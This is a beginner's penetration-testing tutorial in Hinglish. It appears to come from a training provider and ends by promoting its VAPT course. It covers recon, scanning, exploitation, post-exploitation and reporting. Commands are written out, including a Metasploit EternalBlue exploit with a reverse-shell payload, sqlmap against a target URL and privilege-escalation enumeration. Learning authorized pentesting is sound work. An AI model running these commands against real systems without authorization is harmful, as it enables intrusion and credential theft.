Penetration Testing Tutorial: Step by Step Complete Guide for Beginners
Penetration testing India mein cybersecurity career ke liye sabse important skill hai. Yeh penetration testing tutorial aapko ek professional pentester ki tarah think karne aur kaam karne ki methodology sikhayega — reconnaissance se lekar final report tak.
Penetration Testing Kya Hai
Penetration testing ya pentesting ek authorized simulated attack hai jo kisi organization ke computer systems, networks, ya web applications mein vulnerabilities find karne ke liye kiya jaata hai. Pentester same tools aur techniques use karta hai jo real attackers use karte hain, lekin with proper authorization.
Penetration testing VAPT (Vulnerability Assessment and Penetration Testing) ka ek important component hai. Vulnerability assessment sirf weaknesses identify karta hai, jabki penetration testing un weaknesses ko actually exploit karke real impact demonstrate karta hai.
India mein cyber attacks ki tadap badh rahi hai. CERT-In ke according 2023 mein 1.3 million se zyada cybersecurity incidents report hue. Yeh statistics prove karti hain ki penetration testing tutorial India mein kyun itni demand mein hai.
Penetration Testing Methodology Standards
Professional pentesting alag frameworks follow karta hai. Kuchh industry-standard methodologies:
OWASP Testing Guide web applications ke liye widely accepted framework hai. PTES (Penetration Testing Execution Standard) methodology ko comprehensively define karta hai. NIST SP 800-115 technical security assessment ke liye US government standard hai. Yeh frameworks structured aur thorough testing ensure karte hain.
Penetration Testing Phases — Step by Step
Phase 1: Reconnaissance (Information Gathering)
Pentesting ka sabse important phase hai kyunki jo information aap gather karte hain woh poori engagement ki direction define karta hai.
#### Passive Reconnaissance
Isme target ke baare mein publicly available information collect ki jaati hai bina target system ko directly touch kiye. OSINT tools jaise theHarvester, Maltego, Shodan, aur Google Dorking use hote hain. Social media profiles, company websites, aur public databases se information nikaalna is phase ka hissa hai.
#### Active Reconnaissance
Isme target system ko directly interact kiya jaata hai — port scanning, DNS enumeration, aur network mapping shamil hain. Yeh phase faster results deta hai lekin detection risk zyada hota hai.
```bash
theHarvester -d target.com -b google
maltegoce
shodan search "target_name"
```
Phase 2: Scanning
Information gathering ke baad scanning phase mein target ke baare mein detailed data collect kiya jaata hai.
#### Port Scanning with Nmap
```bash
nmap -sS -sV -p- -T4 -oA scan_results 192.168.1.0/24
```
TCP SYN scan (-sS) fast aur stealthy hai. Service version detection (-sV) bataata hai ki konsa service kisi port par run ho raha hai. Operating system detection (-O) target ka OS identify kar sakta hai.
#### Vulnerability Scanning
Automated vulnerability scanners jaise Nessus, OpenVAS, ya Nexpose se vulnerabilities ka assessment kiya jaata hai. Yeh tools CVEs (Common Vulnerabilities and Exposures) ko identify karte hain aur risk scores assign karte hain.
```bash
openvas-start
nikto -h https://target.com
```
Phase 3: Exploitation
Exploitation phase mein confirmed vulnerabilities ko actually exploit kiya jaata hai target system par.
#### Using Metasploit Framework
```bash
msfconsole
search type:exploit name:smb
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST your_ip
exploit
```
#### Manual Exploitation
Kai vulnerabilities ko manually exploit karna padta hai. SQL injection, XSS, aur business logic flaws ke liye automated tools kaafi nahi hote.
```bash
sqlmap -u "http://target.com/page?id=1" --dbs
burpsuite
```
#### Social Engineering Attacks
Phishing emails, pretexting, aur vishing calls bhi pentesting ka hissa ho sakte hain agar scope mein included ho.
Phase 4: Post-Exploitation
Jab initial access mil jaati hai, toh post-exploitation phase mein focus hota hai ki attacker kitna damage kar sakta hai.
#### Privilege Escalation
Limited account se higher privileges gain karna. Linux mein SUID binaries, sudo misconfigurations, aur kernel exploits check kiye jaate hain. Windows mein service misconfigurations, stored credentials, aur unquoted service paths exploit kiye jaate hain.
```bash
# Linux Privilege Escalation
find / -perm -4000 -type f 2>/dev/null
sudo -l
linpeas.sh
# Windows Privilege Escalation
whoami /priv
accesschk.exe -uwcqv "Users" *
PowerUp.ps1
```
#### Lateral Movement
Network mein horizontally move karna — from one compromised system to another.
#### Data Exfiltration
Sensitive data ko identify karna aur extract karna jo attacker access kar sakta hai.
#### Persistence Establishment
System par permanent access maintain karna taaki agar connection cut bhi ho toh baar baar access mil sake.
Phase 5: Reporting
Professional pentest ka result sirf tab valuable hota hai jab uska proper report banaya jaaye.
#### Executive Summary
Non-technical stakeholders ke liye short overview jo business impact par focus kare.
#### Technical Findings
Har vulnerability ke liye:
- Description aur severity (CVSS score ke saath)
- Steps to reproduce with screenshots
- Impact analysis
- Proof of concept (PoC)
- Remediation recommendations with priority
#### Risk Assessment
Vulnerabilities ko likelihood aur impact ke basis par categorize karna — Critical, High, Medium, Low.
#### Remediation Roadmap
Sabse important vulnerabilities ko fix karne ki priority ke saath timeline ke saath actionable steps.
Types of Penetration Testing
Network Penetration Testing
Internal network aur external network infrastructure ko test karna. Firewalls, routers, switches, aur VPNs shamil hain.
Web Application Penetration Testing
Web applications ko OWASP Top 10 framework ke according test karna. SQL injection, XSS, authentication flaws, aur business logic vulnerabilities identify karna.
Mobile Application Penetration Testing
Android aur iOS applications ka security assessment including API backend testing.
Social Engineering Assessment
Phishing simulations aur physical security testing employee awareness measure karne ke liye.
Cloud Penetration Testing
AWS, Azure, ya Google Cloud environment ka security assessment misconfigurations aur access control issues ke liye.
Tools Required for Penetration Testing
Information Gathering
Maltego visual link analysis ke liye. theHarvester email aur subdomain discovery ke liye. Shodan IoT aur server discovery ke liye. Recon-ng automated reconnaissance framework ke liye.
Scanning & Enumeration
Nmap industry standard network scanner hai. Nessus comprehensive vulnerability scanner hai. Burp Suite web application testing ke liye. Gobuster directory enumeration ke liye.
Exploitation
Metasploit Framework most popular exploitation framework hai. SQLMap SQL injection automation ke liye. Hashcat GPU-accelerated password cracking ke liye. John the Ripper traditional password cracking ke liye.
Post-Exploitation
Mimikatz Windows credentials extraction ke liye. PowerSploit PowerShell-based post-exploitation ke liye. LinPEAS Linux privilege escalation automation ke liye.
VAPT Tutorial India: Certification & Career Path
Penetration testing seekhne ke baad certifications aapke skills ko validate karte hain.
CEH (Certified Ethical Hacker) EC-Council ka certification hai jo corporate hiring mein widely recognized hai India mein. OSCP (Offensive Security Certified Professional) hands-on practical exam hai jo globally respected hai. eJPT entry-level practical certification hai jo beginners ke liye suitable hai.
Cyber Defence ka VAPT Professional course penetration testing tutorial ko practical labs ke saath cover karta hai. Haryana aur Hisar mein available yeh course CEH-aligned curriculum provide karta hai.
Penetration testing tutorial seekhna ongoing process hai — technologies evolve karti hain aur attackers new techniques discover karte hain. Structured learning ke saath regular practice se aap professional pentester ban sakte hain.